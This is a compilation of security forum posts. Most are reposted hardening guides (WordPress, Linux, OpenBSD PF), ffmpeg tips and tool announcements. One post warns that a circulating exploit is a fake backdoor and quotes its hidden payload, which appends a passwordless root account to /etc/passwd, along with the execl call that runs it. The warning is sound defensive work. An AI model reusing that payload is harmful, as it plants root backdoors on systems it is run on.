Nytro

E de la forum, nu stiu ce se poate face, sper sa nu trebuiasca schimbat encodingul tabelelor din baza de date. A zis kwe ca se ocupa cand are timp, il mai stresez eu.

Hosting "profesional": F:\xampp\htdocs...

Bypassing Windows 7 Kernel ASLR Authored by Stefan Le Berre Whitepaper called Bypassing Windows 7 Kernel ASLR. In this paper, the author explains every step to code an exploit with a useful kernel ASLR bypass. Successful exploitation is performed on Windows 7 SP0 / SP1. Download: http://dl.packetstormsecurity.net/papers/bypass/NES-BypassWin7KernelAslr.pdf

Cred ca e fake, cel putin asa spun niste persoane care l-au analizat. Creeaza un cont de root fara parola.

Acel "evil" hex se termina cu: "/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD" Trimite datele unde ziceti voi: send(s, buffer, strlen(buffer), 0) Asta e executat local... execl("/bin/sh", "sh", "-c", evil, 0); Deci cred ca e fake, backdoor, deci nu executati (cel putin NU ca root). Sau scoateti: if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); Desi acesta e posibil sa fie necesar pentru shell. Nu stiu ce fac primele instructiuni, daca am timp si reusesc sa dezasamblez datele din hex, poate imi dau seama daca infecteaza sau nu. Deocamdata nu sunt sigur daca e backdoor sau nu, rulati ca user normal si nu ar trebui sa fie probleme.

10 Steps to Securing Your WordPress Installation Fouad Matin on Sep 16th 2011 with 39 comments Tutorial Details Program: WordPress Version: 3.2.1 Difficulty: Beginner Estimated Completion Time: 20 - 30 minutes WordPress is open source which means that everyone, including hackers with a malicious intent, can scour the source code looking for holes in its security. That is why I'm going to show you some good precautionary steps to take to protect you, your WordPress and most importantly, your users. #1 Remove the Admin Superuser Probably, the easiest thing you could do to protect yourself is start off by changing/removing the admin superuser. Anyone who uses WordPress knows that there is a user called admin with a top-level security clearance, especially hackers. If the username is admin, how hard can it be to crack the password. Create a new administrative account but this time with a different name, and then delete the admin account. In fact, what I would personally recommend is to create an administrative account with a very complex username and password (something like x7duEls91*), store it somewhere, and make another account for you to publish content that has your name that does not have executive powers. The admin account is essentially only needed to manage themes, plugins and other aspects of the site that does not need to be changed at on a daily basis – an editor account would be sufficient. “Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months.” ~Clifford Stoll #2 Chose a Strong Password Regardless of the type of site you are running, you may be at risk for a brute-force attack. In the first step when we deleted the admin username, probably deterred most hackers but there are always those that are very persistent or already know your username. The next step to take is to choose a very difficult password and diverse password. A good way to determine whether or not your password is secure is to enter it into an online password checker like passwordmeter.com or to generate a random password. #3 Secure Your Password Also, I prefer take extra precautions when protecting my blog, installing plugins can add an extra layer of security. There are numerous plugins that can handle passwords and login aspects of WordPress. One plugin that I find very useful is Login LockDown; it records the IP address and timestamp of all failed logins in addition to IP blocking after a certain number of failed logins. This plugin is especially helpful when it comes to defending yourself against a brute force attack – most attackers give up on a site if they are IP banned every 5 minutes while running their brute force program. #4 Always Update WordPress As I said earlier, WordPress is open source, making it an easier target for hackers. Nearly 60 million sites use WordPress, when Automattic pumps out an update, the sooner you update your site, the better because when they make a new update they also post the vulnerabilities that they fixed. Also, it doesn't take long to update your WordPress installation, according to WordPress it takes 5 minutes to complete. #5 Hide WordPress Version Let's say that you forget to update your WordPress installation, or just don't have 5 minutes to spare. Your WordPress version gives hackers a good idea of how they can hack your site, especially if it's out dated. By default, WordPress displays the version, because they want it for metrics to see how many people are using which version, etc… However, this is like putting up a bright red sign on your site telling hackers what to do. If you're using a premium theme, odds are that the developer took the liberty of disabling for you, but it's always better to be sure. Open your functions.php file and drop in this line of code. <?php remove_action('wp_head', 'wp_generator'); ?> #6 Change File Permissions It is very important that you have the proper file permissions to ensure your site's security. I recommend that you restrict your file permissions down to the bare, CHMOD value of 744 which essentially makes it read-only to everyone except you. Just open your FTP program and right click the folder or file and click on “File Permissions”. If it is 777, you are very lucky that you haven't already been hacked. You should change the CHMOD value to 744, only giving the “owner” full access. #7 Whitelist Whitelists allow you to manage who is able to access certain parts of your website. It's like building the Great Wall of China around your admin folder, so that no one, except for you, can access the folder. We do this using the .htaccess file. Navigate to your /wp-admin/ folder, then check if there is already a .htaccess file, if there isn't one, just make one. If there is already one there, I suggest making a backup of it before doing any edits. Please make sure you are in the wp-admin folder, and not the root folder. Paste the following code into the .htaccess file: AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "WordPress Admin Access Control" AuthType Basic <LIMIT GET> order deny,allow deny from all # Whitelist Your IP address allow from xx.xx.xx.xxx # Whitelist Your Office's IP address allow from xx.xx.xx.xxx # Whitelist Your IP address While Your Traveling (Delete When You Come Back Home) allow from xx.xx.xx.xxx </LIMIT> Replace the xx's with your IP address, which you can find out at WhatsMyIP.org. Now every time you are going to be logging in from some where other than the places you added into your .htaccess file, you have to add the new IP address before you can use it. #8 Backup Regardless of the level of security of your WordPress site, it is a good habit to always backup your site. There are many ways to do this. You can take advantage of cron jobs, if you're hosting company provides it, by using this command: DBNAME=DB_NAME DBPASS=DB_PASSWORD DBUSER=DB_USER EMAIL="you@your_email.com" mysqldump --opt -u $DBUSER -p$DBPASS $DBNAME > backup.sql gzip backup.sql DATE=`date +%Y%m%d` ; mv backup.sql.gz $DBNAME-backup-$DATE.sql.gz echo 'BLOG BACKUP:Your Backup is attached' | mutt -a $DBNAME-backup-$DATE.sql.gz $EMAIL -s "MySQL Backup" rm $DBNAME-backup-$DATE.sql.gz Alternatively, you can use VaultPress, a service from Automattic. If you're interested in learning more about VaultPress, then I recommend checking out this tutorial. The easiest way to go is to just log into the admin panel, navigate to Tools and then click on Export. This makes your life easier especially when you need to re-set up your WordPress. #9 Hide Your Plugins Putting a blank index file into your /wp-content/plugins/ folder will hide all of your plugins. Some of you are probably thinking, “Who cares if someone can see my plugins?”. Well, plugins can tell hackers how to hack your site, or at least if it is hackable. As you can see, the plugins are clearly visible to anyone who navigates to the /wp-content/plugins folder. If a hacker sees no security plugins, then they immediately know that this will be an easy job. Adding blank index.html into the plugins folder is like putting a security sign in your lawn, it doesn't matter if you actually have the security system, but as long as the hacker doesn't know, he will be less inclined to try anything. #10 Analyze Server Logs The best security tool, regardless of whichever plugin/software you install, is you. In order to be confident that you are completely protected, you have to take a proactive approach to your website's security. Three times a day I check my server logs and web analytics to see if there is any unusual behavior. You're Set! Sursa: http://wp.tutsplus.com/tutorials/10-steps-to-securing-your-wordpress-installation/

Linux Security Basics Published: Monday, August 31st, 2009 by Sam Kleinman One of the most daunting prospects of administering your own server on a public network is dealing with your server's security. While security threats in a networked world are real and it is always important to be mindful of security issues, protecting against possible attacks is often a matter of exercising basic common sense and adhering to some general best practices. This guide takes a broad overview of common security concerns and provides a number of possible solutions to common security problems. You are encouraged to consider deploying some of these measures to "harden" your server against possible attacks. It's important to remember that all of the solutions we present in this document are targeted at specific kinds of attacks, which themselves may be relevant only in specific configurations. Security solutions need to be tailored to the kind of services that you're providing and the software you're running, and the decision whether or not to deploy a specific security solution is often a matter of personal discretion and cost-benefit analysis. Perhaps most importantly, it should be understood that security is a process, not a product (credit to Bruce Schneier.) There is no "magic bullet" set of guidelines that can be followed to ensure the security of any system. Threats are constantly evolving, so vigilance is required on the part of network administrators to prevent unauthorized access to systems. Contents Keep Systems and Software Up To Date Disable Unused Services Lock Down SSH Limit Root and System Users' Access Use a Firewall to Block Unwanted Traffic Use Denyhosts or Fail2Ban to Prevent Password Attacks Encrypt Sensitive Data Best Practices with Databases Keep Systems and Software Up To Date One of the most significant sources of security vulnerabilities are systems running out of date software with known security holes. Make a point of using your system's package management tools to keep your software up to date; this will greatly assist in avoiding easily preventable security intrusions. Running system updates with the package management tool, using "apt-get update && apt-get upgrade" (for Debian and Ubuntu Systems) or "yum update" (for CentOS and Fedora systems) is simple and straightforward. This practice ensures that if your distribution maintains active security updates, your system will be guarded against many security holes in commonly used software packages. System update tools will, however, not keep software up to date that you've installed outside of package management. This includes software that you've compiled and installed "by hand" (e.g. with "./configure && make && make install") and web-based applications that you've installed from a software developer's site, as is often the case with applications like WordPress and Drupal. Also excluded from protection will be libraries and packages you've installed with supplementary package management tools like Ruby's Gems, Perl's CPAN tool, Python easy_install, and Haskell Cabal. You will have to manage the process of keeping these files up to date yourself. The method you use to make sure that your entire system is kept up to date is a matter of personal preference, and depends on the nature of your workflow. We would recommend trying very hard to use the versions of software provided by your operating system or other programming platform-specific package management tools. If you must install from "source," we would recommend that you save the tarballs and source files for all such software in /src/ or ~/src/ so that you can keep track of what software you've installed in this manner. Often, you can remove a manually compiled application by issuing "make uninstall" in the source repository (directory). Additionally, it may be helpful to maintain a list of manually installed software, with version numbers and download locations. You may also want to investigate packaging your own software so that you can install it with apt, yum or pacman. Because of the complexity of maintaining software outside of the system's package management tools we strongly recommend avoiding manually installing software unless absolutely necessary. Your choice in a Linux distribution should be heavily biased by the availability of software in that distro's repositories for the systems you need to run on your server. Disable Unused Services One common avenue for attack involves exploiting unused applications. In general we recommend disabling daemons (services) that you're not actively using, developing, or testing. Using "/etc/init.d/[service] stop" or "/etc/rc.d/[service] stop", depending on your distribution, to deactivate unused services can prevent these services from being exploited later. Please note that services that are configured to start at system boot will run again should you reboot your server, so it may be safer to disable them from automatically starting using your distribution's particular method for doing so. Not only will unused services no longer consume system resources, if there are any security vulnerabilities in these services, would-be attackers will be unable to exploit them. Any service that you're not using should be turned off. To see what processes you're currently running, we recommend using the htop tool. Install with "apt-get install htop", "yum install htop" or "pacman -Sy htop". Lock Down SSH SSH, the secure shell service, is the main avenue we use to interact with servers remotely. While SSH provides exceptional encryption and security for users, it also provides a great deal of access to your server and thus represents an appealing target for an attacker. To counteract the possibility of having your servers compromised with an SSH attack, we recommend taking the following steps. First, disable root logins via SSH. Since the root username is predictable and provides complete access to your system, providing unfettered access to this account over SSH is unwise. Edit the /etc/ssh/sshd_config file to modify the PermitRootLogin option as follows: PermitRootLogin no If you need to gain root access to your system you can (and should) use tools like su and sudo to do so without logging in as root. Second, disable password authentication. Generate and use SSH keys to log into your system. Without passwords enabled, attackers will need to guess (or steal) your SSH private key in order to gain access to your server. In the file "/etc/ssh/sshd_config", modify PasswordAuthentication as follows: PasswordAuthentication no If you do not have SSH keys generated you will have to generate them on your own machine before disabling password authentication. To generate SSH keys for your host, issue the following command on your local system if you're using Mac OS X or Linux locally: ssh-keygen Answer the program's inquiries; generally the defaults are acceptable. This will generate an SSH key using the RSA algorithm. If you want to use the DSA algorithm, append "-t dsa" to the command. Your SSH key will be generated with the private key in ~/.ssh/id_rsa and the public key in ~/.ssh/id_rsa.pub. You will want to copy the public key into the ~/.ssh/authorized_keys file on the remote machine, using the following commands (replacing your own SSH user and host names). scp ~/.ssh/id_rsa.pub user@hostname.com:/home/user/.ssh/uploaded_key.pub ssh user@hostname.com "cat ~/.ssh/uploaded_key.pub >> ~/.ssh/authorized_keys" If you're using PuTTY in Windows, note that it has the ability to generate keys using puttygen that you can upload to your server. You can download puttygen from the PuTTY Homepage. If you have a problem logging in you will need physical access or out-of-band console access to your server to restore SSH functionally. You can use the Linode shell (LISH) to access your server's console. Limit Root and System Users' Access In general, users and applications that do not have access to a system on your server, either by virtue of limited access rules or by limited abilities to log into the system, cannot do any harm to the system. Additionally, one common way of compromising a system is to trick the system into thinking that a user has access rights greater than what they actually have. While these "escalation attacks" are relatively uncommon and are often patched rather quickly, they are only a threat when there are accounts that can be exploited. To address these possible threats we suggest the following best practices with regards to managing your user accounts: Don't give people user accounts if they don't need them. There are often ways to provide access to specific servers without giving users accounts with even limited access to the system. Giving someone a shell account on your system should be seen as a last resort in most cases. If you need to have multiple administrators for a system, rather than share a single root password among many people, use sudo to give "root access" but force users to authenticate with their own password. The sudo command also provides more detailed logging, so you know which root commands were issued by which user. Leverage user groups and permissions to provide granular access control when you have no option but to give a user an account on your system. Disable unused system user accounts, either by removing the account outright with the userdel command, or by locking the user account with "usermod --lock LOGIN-NAME" until the user needs access again (achieved with "usermod --unlock"). Limiting access to your servers and adhering to best practices with regards to administrative access and user account management won't guard against escalation attacks or all possible intrusions. However, by limiting the size of your "shadow" you decrease the likelihood of becoming the victim of many kinds of attacks. Use a Firewall to Block Unwanted Traffic As the term "firewall" has fallen into common non-technical usage, the specific role of a firewall solution as part of a larger security plan has become somewhat unclear. Firewalls are simple traffic filters that can be used to limit and constrain inbound traffic to your Linode. The aim is to prevent all traffic arriving from certain IP addresses or over certain ports in situations where you know that traffic is unwanted or malicious. On the whole, firewall settings and configurations are beyond the scope of this document. We recommend that you review specific guides for firewall configuration to learn how to configure your firewall correctly for your use. In this section, we hope to explain some basic firewall settings that you can use to prevent most intrusions. Although there are numerous packages on Linux systems that enable efficient and effective configuration of firewalls, the actual firewalls are created using iptables. This uses the packet filtering capabilities of the Linux kernel itself. This means that the firewall rules are enforced very efficiently. Nevertheless, the firewall that you configure can be as open or as restrictive as you need. It's sometimes difficult to decide what the best strategy is for deploying an effective firewall. With the understanding that your firewall setup needs must take the actual uses of your server and its users into account, we offer the following list as potential strategies for deploying a firewall. Identify the services that you're using and close all ports on all public IP addresses, except the ones that the services you use listen on. The most common standard ports include: web servers on port 80, ssh on port 22, smtp on port 25. If there are any security vulnerabilities for software running on other ports or intruders are scanning for open ports, the firewall will reject this traffic before it can invade your system. Disadvantages: This filter can be confusing if your suite of services change regularly, and you may end up unintentionally locking yourself out of services that you want to use, which can be hard to troubleshoot. Watch access logs for suspicious behavior and block inbound traffic from IPs and IP ranges that are attacking your server. If you're getting malicious activity from a specific IP address, then it's probably safe to block all traffic from that IP, at least for a while. Disadvantages: People can change their IP addresses to get around these rules, and blocking individual addresses from accessing your server can't prevent attacks before they happen. Block inbound traffic on sensitive ports, except from IP addresses that you know are good. Some services, like SSH, can grant an attacker a great deal of access to the system, while HTTP servers like Apache are designed to be accessed by the public at large. This is a "whitelisting" strategy and can be used to effectively secure services like SSH and database servers that are accessed over a private network. If you know where "good" traffic is likely to originate from, you can prevent would be attackers from gaining access to your machines without hindering the good traffic. Disadvantages: This strategy is only effective if you have a limited number of "good" sources of traffic, and is ineffective at securing services that need to be publicly accessible. These rules can -- and perhaps should -- be deployed to varying degrees as part of a larger security strategy. Firewalls alone don't prevent malicious behavior and are not a security cure-all, but they can be quite effective at preventing some attacks. When deciding to deploy firewall rules, the decision often comes down to the following questions: "will this rule impede traffic that actually want to service?", "will this rule make it more difficult to use the server as I want to?", and finally "will this rule successfully block traffic that I don't want to serve?" The answers to these questions often vary in response to the services you're providing and the way you use your server, but we hope that the above guidelines provide a productive starting point for your firewall deployment. Use Denyhosts or Fail2Ban to Prevent Password Attacks The DenyHosts and Fail2Ban applications (for which packages should be included in your distribution's software repository) help prevent dictionary attacks on your server. The basic concept is simple: these programs watch for attempted logins, and if your server is receiving multiple failed login attempts from the same IP address, these applications will insert firewall rules that will block traffic from the attacker's IP address. The assumption is that "good" users are very likely to be able to get their password correct in less than 3-5 attempts, and that anyone who submits an incorrect password more than 3-5 times is trying to break into a system. While there is the potential for false positives, the "bans" can be temporary, and are easily reversed by the administrator if necessary. The number of allowed attempts and the length of time the resulting ban remains in effect are configurable by the system administrator. Attempted logins can be monitored on a variety of protocols, including HTTP Auth, SMTP, and SSH. While this approach to restricting traffic won't prevent a compromised password from being used to break into a system, it can reduce the risk that a system user's weak password poses to the server as a whole. Encrypt Sensitive Data If most "best security practices" come down to exercising a fair bit of paranoia over your data and systems, then implementing data encryption represents the most severe expression of this paranoia. Well tuned access control lists are often quite effective at preventing most casual abuse, and there is always some resource overhead for encrypting and decrypting data. Nevertheless, if you're storing truly sensitive data, it's often quite prudent to encrypt it. There are a number of different options for accomplishing this goal. First, encrypt individual files using PGP and the tools provided by the GNU Privacy Gaurd package in your distribution (frequently, as "gpg"). PGP is very secure, and if you already use PGP keys and have a small number of sensitive files, this can be quite workable. This prevents casual snoopers from reading the contents of a file, even if they have read access to it, though it only works on a file-by-file basis. Additionally, it can sometimes be confusing to make sure you're encrypting data with the proper public key. The second option is more advanced. It requires running your own kernel under PV-GRUB, and using the dm-crypt kernel module to encrypt the contents of the disks. This takes a toll on disk performance, and requires you to enter a password on boot in order to access your files. The disadvantages are plenty: you are responsible for maintaining an up-to-date kernel, and if you lose your password all your files will be unrecoverable. Additionally, disk-level encryption protects against a very narrow set of threats: against physical attacks against the hardware and against unforeseen (and unlikely) issues with the virtualization engine in use. Once a machine with disk-level encryption is booted and running -- aside from the slight performance hit -- it is indistinguishable from an unencrypted system in terms of user experience. The final option, and perhaps the best middle ground, is to use a system like "EncFS" which creates an encrypted filesystem in user-space (using the FUSE interface). This system writes your files in an encrypted format to the disk, and when you mount the filesystem you're provided with a usable and unencrypted view of it. When you unmount the file system, you only have encrypted files. EncFS doesn't protect meta-data information like file size, permissions, and last-edited time, but is otherwise very secure. For sensitive files, this prevents the additional complexity of managing individual encrypted files, while still allowing for high quality data security. Again, from a holistic perspective, encrypting in this manner provides minimal benefit for most use cases and comes with a great deal of overhead. Nevertheless, there are some situations where encryption makes a lot of sense, particularly when you're managing very sensitive data on networked machines. Consider encryption as a possible tool among many options for creating a more secure environment. Best Practices with Databases One common class of security issues involves the applications that you develop and run on your server, as opposed to all of the system software that your application depends upon. There are some basic guidelines that you may want to follow as you develop applications. Distrust all inputs by sanitizing all text and content that users could put into the system. Most programming languages have "string scrubber" tools that you can use to strip out all code, scripts, and unwanted HTML tags. Use these to prevent anyone from using your site to publish malicious code, or use code to exploit your server. If your application is written in Perl, consider enabling warnings and "taint mode" by starting your program with "#!/usr/bin/perl -tw". Taint mode requires all input from external sources be tested with a regular expression before it may be used in your program. This means you won't accidentally use an untrusted input without (hopefully) running a sane regular expression check on it to make sure it contains only valid data. If your application is written in PHP, consider using the mysql_real_escape_string and htmlentities functions to sanitize user input such as GET and POST data. Using the above "string scrubbers" are a great way to begin securing your PHP code. You can find more information and examples on the mysql_real_escape_string and htmlentities manual pages. Sanitize database inputs to prevent SQL injection attacks when using a database system. One typical approach involves using prepared statements with the database interface. This prevents your database from generating unexpected output, and makes it impossible for users to perform unintended modification to your database or to access unauthorized content from your system. Authenticate all requests for secure information, rather than passing or storing IsAuthenticated or IsPrivileged status to the user. In short, avoid storing any information in cookies or in the HTTP query string that you don't want the users to be able to edit. These tips for coding practices, and indeed all of the security tips that we present here, are simply a starting place for ensuring that your system remains protected against intrusions from malicious users. Nevertheless, from our experience even these small suggestions will help keep your system secure from many common exploits. We hope that this guide has presented a number of manageable approaches that you can deploy in order to help ensure that your system remains secure. Sursa: Linux Security Basics

TUS - The Untraceable Surfer We provide a platform for true anonymous, safe and unrestricted web surfing. The internet is a public network where eavesdropping is made very easy. Also internet service providers, workplaces and governments may restrict and monitor internet usage. By surfing the internet on our terminal servers all these privacy concerns and restrictions are gone. Download: https://www.tusurfer.com/tus/download.do Dear User, On the behalf of the TUS team I welcome you to our website. The TUS website allows and enables citizens of any country to be able to freely and safely access any information on the internet. And the reason this website was created? The idea was born while I was living in a communist country. Although later I moved to Canada (one of the best countries in the world) I have not forgotten my roots. Please enjoy our services and help us make them better by giving us your invaluable feedback. Also if you have any suggestion, concern or question we would love to hear from you. Kindest regards, Nigel Fox Info: https://www.tusurfer.com/tus/index.jsp

19 ffmpeg commands for all needs ffmpeg is a multiplatform, open-source library for video and audio files. I have compiled 19 useful and amazing commands covering almost all needs: video conversion, sound extraction, encoding file for iPod or PSP, and more. Getting infos from a video file ffmpeg -i video.avi Turn X images to a video sequence ffmpeg -f image2 -i image%d.jpg video.mpg This command will transform all the images from the current directory (named image1.jpg, image2.jpg, etc…) to a video file named video.mpg. Turn a video to X images ffmpeg -i video.mpg image%d.jpg This command will generate the files named image1.jpg, image2.jpg, … The following image formats are also availables : PGM, PPM, PAM, PGMYUV, JPEG, GIF, PNG, TIFF, SGI. Encode a video sequence for the iPpod/iPhone ffmpeg -i source_video.avi input -acodec aac -ab 128kb -vcodec mpeg4 -b 1200kb -mbd 2 -flags +4mv+trell -aic 2 -cmp 2 -subcmp 2 -s 320x180 -title X final_video.mp4 Explanations : Source : source_video.avi Audio codec : aac Audio bitrate : 128kb/s Video codec : mpeg4 Video bitrate : 1200kb/s Video size : 320px par 180px Generated video : final_video.mp4 Encode video for the PSP ffmpeg -i source_video.avi -b 300 -s 320x240 -vcodec xvid -ab 32 -ar 24000 -acodec aac final_video.mp4 Explanations : Source : source_video.avi Audio codec : aac Audio bitrate : 32kb/s Video codec : xvid Video bitrate : 1200kb/s Video size : 320px par 180px Generated video : final_video.mp4 Extracting sound from a video, and save it as Mp3 ffmpeg -i source_video.avi -vn -ar 44100 -ac 2 -ab 192 -f mp3 sound.mp3 Explanations : Source video : source_video.avi Audio bitrate : 192kb/s output format : mp3 Generated sound : sound.mp3 Convert a wav file to Mp3 ffmpeg -i son_origine.avi -vn -ar 44100 -ac 2 -ab 192 -f mp3 son_final.mp3 Convert .avi video to .mpg ffmpeg -i video_origine.avi video_finale.mpg Convert .mpg to .avi ffmpeg -i video_origine.mpg video_finale.avi Convert .avi to animated gif(uncompressed) ffmpeg -i video_origine.avi gif_anime.gif Mix a video with a sound file f fmpeg -i son.wav -i video_origine.avi video_finale.mpg Convert .avi to .flv ffmpeg -i video_origine.avi -ab 56 -ar 44100 -b 200 -r 15 -s 320x240 -f flv video_finale.flv Convert .avi to dv f fmpeg -i video_origine.avi -s pal -r pal -aspect 4:3 -ar 48000 -ac 2 video_finale.dv Or: ffmpeg -i video_origine.avi -target pal-dv video_finale.dv Convert .avi to mpeg for dvd players ffmpeg -i source_video.avi -target pal-dvd -ps 2000000000 -aspect 16:9 finale_video.mpeg Explanations : target pal-dvd : Output format ps 2000000000 maximum size for the output file, in bits (here, 2 Gb) aspect 16:9 : Widescreen Compress .avi to divx ffmpeg -i video_origine.avi -s 320x240 -vcodec msmpeg4v2 video_finale.avi Compress Ogg Theora to Mpeg dvd ffmpeg -i film_sortie_cinelerra.ogm -s 720x576 -vcodec mpeg2video -acodec mp3 film_terminée.mpg Compress .avi to SVCD mpeg2 NTSC format: ffmpeg -i video_origine.avi -target ntsc-svcd video_finale.mpg PAL format: ffmpeg -i video_origine.avi -target pal-svcd video_finale.mpg Compress .avi to VCD mpeg2 NTSC format: ffmpeg -i video_origine.avi -target ntsc-vcd video_finale.mpg PAL format: ffmpeg -i video_origine.avi -target pal-vcd video_finale.mpg Multi-pass encoding with ffmpeg ffmpeg -i fichierentree -pass 2 -passlogfile ffmpeg2pass fichiersortie-2 This article is an English adaptation of Jean Cartier ffmpeg exemples. Sursa: http://www.catswhocode.com/blog/19-ffmpeg-commands-for-all-needs

Firewalling with OpenBSD's PF packet filter Peter N. M. Hansteen <peter _@_ bsdly.net> Copyright 2005 - 2011 Peter N. M. Hansteen Table of Contents Before we start PF? Packet filter? Firewall? NAT? PF today BSD vs Linux - Configuration Simplest possible setup (OpenBSD) Simplest possible setup (FreeBSD) Simplest possible setup (NetBSD) First rule set - single machine Slightly stricter Statistics from pfctl A simple gateway, NAT if you need it Gateways and the pitfalls of in, out and on What is your local network, anyway? Setting up That sad old FTP thing If We Have To: ftp-proxy With Redirection Historical FTP proxies: do not use Ancient FTP through NAT: ftp-proxy Ancient: FTP, PF and routable addresses: ftpsesame, pftpx and ftp-proxy! ftp-proxy, slightly new style Making your network troubleshooting friendly Then, do we let it all through? The easy way out: The buck stops here Letting ping through Helping traceroute Path MTU discovery Network hygiene: Blocking, scrubbing and so on block-policy scrub antispoof Handling non-routable addresses from elsewhere A web server and a mail server on the inside Taking care of your own - the inside Tables make your life easier Logging Taking a peek with tcpdump Other log tools you may want to look into But there are limits (an anecdote) Keeping an eye on things with systat Keeping an eye on things with pftop Invisible gateway - bridge Directing traffic with ALTQ ALTQ - prioritizing by traffic type So why does this work? Using a match Rule for Queue Assignment ALTQ - allocation by percentage ALTQ - handling unwanted traffic CARP and pfsync Wireless networks made simple A little IEEE 802.11 background WEP (Wired Equivalent Privacy) WPA (WiFi Protected Access) Setting up a simple wireless network An open, yet tightly guarded wireless network with authpf Turning away the brutes expiring table entries with pfctl Using expiretable to tidy your tables Giving spammers a hard time Remember, you are not alone: blacklisting List of black and grey, and the sticky tarpit Setting up spamd Some early highlights of our spamd experience Beating'em up some more: spamdb and greytrapping Enter greytrapping Your own traplist Deleting, handling trapped entries The downside: some people really do not get it Conclusions from our spamd experience PF - Haiku References Where to find the tutorial on the web If you enjoyed this: Buy OpenBSD CDs and other items, donate! Before we start This lecture[1] will be about firewalls and related functions, starting from a little theory along with a number of examples of filtering and other network traffic directing. As in any number of other endeavors, the things I discuss can be done in more than one way. More information: The Book of PF, training, consulting Most of the topics we touch on here is covered in more detail in The Book of PF, which was written by the same author and published by No Starch Press at the end of 2007, with a revised and updated second edition published in November 2010. The book is an expanded and extensively rewritten followup to this tutorial, and covers a range of advanced topics in addition to those covered here. This tutorial is in minimal-maintainence mode, in that I'll occasionally make an effort to keep the information in it up to date, but it will not expand in scope. For more in-depth information or topics not covered here, check the book, the PF User Guide (also known as The PF FAQ) or the relevant man pages. If you buy the book via The OpenBSD Bookstore, the OpenBSD project gets a slightly larger a cut. If you need PF related consulting or training, please contact me for further details. You may want to read my Rent-a-geek writeup too. Under any circumstances I will urge you to interrupt me when you need to. That is, if you will permit me to use what I learn from your comments later, either in revised versions of this lecture or in practice at a later time. PF? What, then is PF? Let us start by looking briefly at the project's history to put things in their proper context. OpenBSD's Packet Filter subsystem, which most people refer to simply by using the abbreviated form 'PF', was originally written in an effort of extremely rapid development during the northern hemisphere summer and autumn months of 2001 by Daniel Hartmeier and a number of OpenBSD developers, and was launched as a default part of the OpenBSD 3.0 base system in December of 2001. The need for a new firewalling software subsystem for OpenBSD arose when Darren Reed announced to the world that IPFilter, which at that point had been rather intimately integrated in OpenBSD, was not after all BSD licensed. In fact quite to the contrary. The license itself was almost a word by word copy of the BSD license, omitting only the right to make changes to the code and distribute the result. The OpenBSD version of IPFilter contained quite a number of changes and customizations, which it turned out were not allowed according to the license. IPFilter was removed from the OpenBSD source tree on May 29th, 2001, and for a few weeks OpenBSD-current did not contain any firewalling software. Fortunately, in Switzerland Daniel Hartmeier was already doing some limited experiments involving kernel hacking in the networking code. His starting point was hooking a small function of his own into the networking stack, making packets pass through it, and after a while he had started thinking about filtering. Then the license crisis happened. IPFilter was pruned from the source tree on May 29th. The first commit of the PF code happened Sunday, June 24 2001 at 19:48:58 UTC.[2] A few months of rather intense activity followed, and the version of PF to be released with OpenBSD 3.0 contained a rather complete implementation of packet filtering, including network address translation. From the looks of it, Daniel Hartmeier and the other PF developers made good use of their experience with the IPFilter code. Under any circumstances Daniel presented a USENIX 2002 paper with performance tests which show that the OpenBSD 3.1 PF performed equally well as or better under stress than IPFilter on the same platform or iptables on Linux. In addition, some tests were run on the original PF from OpenBSD 3.0. These tests showed mainly that the code had gained in efficiency from version 3.0 to version 3.1. The article which provides the details is available from Daniel Hartmeier's web, see http://www.benzedrine.cx/pf-paper.html. I have not seen comparable tests performed recently, but in my own experience and that of others, the PF filtering overhead is pretty much negligible. As one data point, the machine which gateways between one of the networks where I've done a bit of work and the world is a Pentium III 450MHz with 384MB of RAM. When I've remembered to check, I've never seen the machine at less than 96 percent 'idle' according to top. It is however worth noting that various optimisations have been introduced to OpenBSD's PF code during recent releases (mainly by the current main PF developers Henning Brauer and Ryan McBride with contributions from others), making each release from 4.4 through 4.9 perform better than its predecessors. ................................................................. Online: http://home.nuug.no/~peter/pf/en/long-firewall.html

RTCA : Portable Windows forensic analysis tool OCTOBER 20, 2011 13:13 PM - 0 COMMENTS by BLACK on OCTOBER 20, 2011 RTCA is a Windows forensic analysis tool, registry, audit logs and files. RTCA basically is a standalone and portable application for extraction and analysis investigation, can be used in local configuration report or analysis after extraction. As it analysis after extraction analysis is fast and acurate. Features of RTCA Compatible with Windows XP, Vista, 2003, 2008, 7, 8 32-bit (64-bit version will be compiled) and 90% ok under Wine. Can be run in command line. Processing and copies of registry files (damaged registry too). System information: bootKeys/syskey, security features, serials MS… Applications, updates, list of services, drivers, and USB… UserAssist (command history performed by each user). Applications at startup. Network configuration, wireless and SSID. List of accounts, users and hash passwords. Passwords stored in the registry (eg VNC). Most Recent Used historical paths. Registry Viewer Lite. Processing of local logs file, evt (Windows= Vista) and log ( format linux / unix). file system extraction (file and directory) : acls, hidden and protected system state. Files explorer lite. Processes and associated network ports. Synthesis (audit logs, file and registry) sort by date. Export / Import results in CSV, HTML and XML. Download: http://omnia-projetcs.googlecode.com/svn/trunk/RTCA/RtCA.exe Sursa: http://www.pentestit.com/rtca-portable-windows-forensic-analysis-tool/

